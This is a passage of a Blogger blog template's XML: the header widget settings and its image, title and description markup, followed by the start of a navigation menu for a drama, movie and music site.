<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-fSZITB9di6E/XbV5P5Q4ReI/AAAAAAAADRk/YOQbJNdEGsIwUC3NlWLW4ZJPdHSxBIMigCK4BGAYYCw/s1600/moview%2Blogo.png</b:widget-setting>
<b:widget-setting name='displayHeight'>118</b:widget-setting>
<b:widget-setting name='sectionWidth'>269</b:widget-setting>
<b:widget-setting name='useImage'>true</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='imagePlacement'>REPLACE</b:widget-setting>
<b:widget-setting name='displayWidth'>522</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:if cond='data:useImage'>
<b:if cond='data:imagePlacement == "BEHIND"'>
<!--
Show image as background to text. You can't really calculate the width
reliably in JS because margins are not taken into account by any of
clientWidth, offsetWidth or scrollWidth, so we don't force a minimum
width if the user is using shrink to fit.
This results in a margin-width's worth of pixels being cropped. If the
user is not using shrink to fit then we expand the header.
-->
<b:if cond='data:mobile'>
<div id='header-inner'>
<div class='titlewrapper' style='background: transparent'>
<h1 class='title' style='background: transparent; border-width: 0px'>
<b:include name='title'/>
</h1>
</div>
<b:include name='description'/>
</div>
<b:else/>
<div expr:style='"background-image: url(\"" + data:sourceUrl + "\"); " + "background-position: " + data:backgroundPositionStyleStr + "; " + data:widthStyleStr + "min-height: " + data:height + "_height: " + data:height + "background-repeat: no-repeat; "' id='header-inner'>
<div class='titlewrapper' style='background: transparent'>
<h1 class='title' style='background: transparent; border-width: 0px'>
<b:include name='title'/>
</h1>
</div>
<b:include name='description'/>
</div>
</b:if>
<b:else/>
<!--Show the image only-->
<div id='header-inner'>
<a expr:href='data:blog.homepageUrl' style='display: block'>
<img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + "_headerimg"' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/>
</a>
<!--Show the description-->
<b:if cond='data:imagePlacement == "BEFORE_DESCRIPTION"'>
<b:include name='description'/>
</b:if>
</div>
</b:if>
<b:else/>
<!--No header image -->
<div id='header-inner'>
<div class='titlewrapper'>
<h1 class='title'>
<b:include name='title'/>
</h1>
</div>
<b:include name='description'/>
</div>
</b:if>
</b:includable>
<b:includable id='description'>
<div class='descriptionwrapper'>
<p class='description'><span><data:description/></span></p>
</div>
</b:includable>
<b:includable id='title'>
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<data:title/>
<b:else/>
<a expr:href='data:blog.homepageUrl'><data:title/></a>
</b:if>
</b:includable>
</b:widget>
</b:section>
<nav id='nav' itemscope='itemscope' itemtype='http://schema.org/SiteNavigationElement' role='navigation'>
<div id='menubar'>
<a class='menu-touch' href='#'><i class='fa fa-list'/> Menu</a>
<ul class='nav-plus menu-nav'>
<li><a class='active' href='/'><span itemprop='name'>Home</span></a></li>
<li><a href='#' itemprop='url'><span itemprop='name'>Drama</span></a></li>
<li><a href='#' itemprop='url'><span itemprop='name'>Movie</span></a></li>
<li><a href='#' itemprop='url'><span itemprop='name'>Music</span></a></li>
<li><a class='ai' href=''>Categories <i aria-hidden='true' class='fa fa-angle-down'/></a>
<ul>
<li><a href=''>Item 11</a></li>
<li><a href=''>Item 12</a></li>